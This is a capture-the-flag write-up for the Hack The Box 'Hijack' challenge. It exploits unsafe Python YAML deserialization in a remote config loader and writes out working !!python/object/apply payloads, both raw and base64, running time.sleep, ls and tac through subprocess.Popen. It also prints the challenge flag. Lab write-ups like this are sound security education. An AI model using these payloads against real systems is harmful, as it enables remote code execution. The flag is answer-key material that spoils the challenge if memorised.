# Hijack

This challenge requires the user to connect to a remote docker container using netcat. Once connected, the user can create or load a configuration file.

Creating a configuration file will cause the server to print out a base64 version of this configuration once finished. This allows users to load saved configurations using the `Load config` command.

## Testing the Program

![Testing the program](./1-testing-program.png)

Decoding this configuration suggests it might be yaml data. I immediately suspected the program is vulnerable to a de-serialization attack.

## Confirm Deserialization Attack Vector

![Decoding configuration](./2-decoding-configuration.png)

[HackTricks](https://book.hacktricks.xyz/pentesting-web/deserialization/python-yaml-deserialization) has a page on this and I borrowed the sleep command to see if it would execute: 

Command: `!!python/object/apply:time.sleep [2]`

Base64: `ISFweXRob24vb2JqZWN0L2FwcGx5OnRpbWUuc2xlZXAgWzJd`

![Test deserialization payload](./3-test-payload.png)

While the photo isn't animated, this attack worked. The program delayed the response.

## Building an Exploit

Now that I knew code was executing, tried creating a payload for the `ls` command to see if I get a response:

Base64: `ISFweXRob24vb2JqZWN0L2FwcGx5OnN1YnByb2Nlc3MuUG9wZW4KLSAhIXB5dGhvbi90dXBsZQogIC0gbHMK`

Base64 Decoded:
```
!!python/object/apply:subprocess.Popen
- !!python/tuple
  - ls
```

![Test ls command payload](./5-test-ls-exploit.png)

Success! However, when I tried `cat flag.txt` the server returned `Unable to load config!`.

## Solution

After a few more attempts, I figured `cat` was blocked or missing on the server. After a bit of searching I found a suggestion [here](https://jarv.org/posts/cat-without-cat/) to use tac (reverse of cat)... more specifically:

Command: `tac flag.txt | tac`

Base64: `ISFweXRob24vb2JqZWN0L2FwcGx5OnN1YnByb2Nlc3MuUG9wZW4KLSAhIXB5dGhvbi90dXBsZQogIC0gdGFjCiAgLSBmbGFnLnR4dAogIC0gJ3wnCiAgLSB0YWMK`

Base64 Decoded:
```
!!python/object/apply:subprocess.Popen
- !!python/tuple
  - tac
  - flag.txt
  - '|'
  - tac
```

This time, the command worked after uploading the config.

![Using tac to obtain flag.txt](./6-flag-exploit.png)

## Flag

`HTB{1s_1t_ju5t_m3_0r_iS_1t_g3tTing_h0t_1n_h3r3?}`